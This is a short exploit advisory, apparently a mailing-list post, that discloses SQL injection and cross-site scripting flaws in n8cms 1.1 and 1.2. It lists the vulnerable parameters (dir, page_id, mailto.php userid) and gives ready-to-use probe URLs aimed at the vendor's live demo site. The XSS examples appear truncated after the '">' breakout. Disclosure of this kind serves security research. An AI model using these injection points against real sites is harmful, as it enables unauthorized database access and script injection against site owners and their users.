----------------------------------------------------------------- n8cms 1.1 & 1.2 version Sql Ýnjection And XSS Site:http://www.nathanlandry.com Demo:http://www.nathanlandry.com/n8cms_v1.1/ Credit : Liz0ziM webpage:www.biyosecuerity.com Mail :liz0@bsdmail.com -------------------------------------------------------------------- 1)Sql Ýnjection http://[target]/path/?dir=[sql] http://[target]/path/?dir=home&page_id=[sql] 2)Xss [ Cross Site Scripting ] http://[target]/path/?dir=[xss] http://[target]/path/?dir=home&page_id=[xss] http://[target]/path/mailto.php?userid=[xss] --------------------------------------------------------------------- example: Sql: http://www.nathanlandry.com/n8cms_v1.1/?dir=home&page_id=' http://www.nathanlandry.com/n8cms_v1.1/?dir=' Xss: http://www.nathanlandry.com/n8cms_v1.1/?dir="> http://www.nathanlandry.com/n8cms_v1.1/?dir="> http://www.nathanlandry.com/n8cms_v1.1/?dir=home&page_id="> http://www.nathanlandry.com/n8cms_v1.1/mailto.php?userid="> ---------------------------------------------------------------------- Source: http://www.blogcu.com/Liz0ziM/307940/ http://biyosecurity.be/bugs/n8cms.txt -- _______________________________________________ Get your free email from http://mymail.bsdmail.com